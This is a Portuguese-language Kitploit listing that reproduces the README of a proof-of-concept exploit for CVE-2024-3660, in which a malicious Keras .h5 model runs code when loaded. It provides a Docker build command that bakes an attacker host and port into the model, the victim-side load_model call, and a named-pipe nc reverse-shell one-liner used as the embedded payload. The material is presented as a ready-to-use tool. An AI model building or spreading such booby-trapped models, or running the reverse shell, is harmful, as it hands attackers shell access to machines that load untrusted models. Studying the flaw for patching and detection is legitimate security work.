Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-3660-PoC — Um PoC para CVE-2024-3660. Execução Arbitrária de Código no Keras. | Kitploit
Ferramentas/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoDesenvolvimento de PayloadsSegurança de IAExploração de Binários
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

Um PoC para CVE-2024-3660. Execução Arbitrária de Código no Keras.

Ver Repositório
41há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-3660 – TensorFlow Keras Execução Arbitrária de Código via Modelo Malicioso

Visão Geral

CVE-2024-3660 é uma vulnerabilidade de execução arbitrária de código no framework Keras do TensorFlow que afeta versões < 2.13.
Ela permite que um atacante incorpore código Python dentro de um modelo (por exemplo, via uma camada Lambda) que é executado automaticamente quando o modelo é carregado.

Quando um arquivo de modelo .h5 malicioso é carregado em um ambiente vulnerável, comandos arbitrários são executados com as mesmas permissões do processo de carregamento.


Versões Afetadas

  • Keras do TensorFlow < 2.13.0
  • Modelos Keras carregados via:
    root@kitploit:~
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    

ou em versões mais antigas do TensorFlow onde safe_mode não está habilitado por padrão.

Descrição da PoC

Esta PoC usa uma compilação baseada em Docker para gerar um modelo hack.h5 malicioso contendo um payload de reverse shell. Quando o modelo é carregado em uma versão vulnerável do TensorFlow, ele se conecta de volta à máquina do atacante.

Uso

1. Compilar e Extrair o Modelo Malicioso

root@kitploit:~
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. Carregar o Modelo Malicioso (Lado da Vítima)

  • Em um ambiente TensorFlow vulnerável (< 2.13):
root@kitploit:~
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

Payload

  • O payload incorporado usa nc para um reverse shell:
root@kitploit:~
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

Referências

NVD CMU Oligo Secuirty

Baixar ferramenta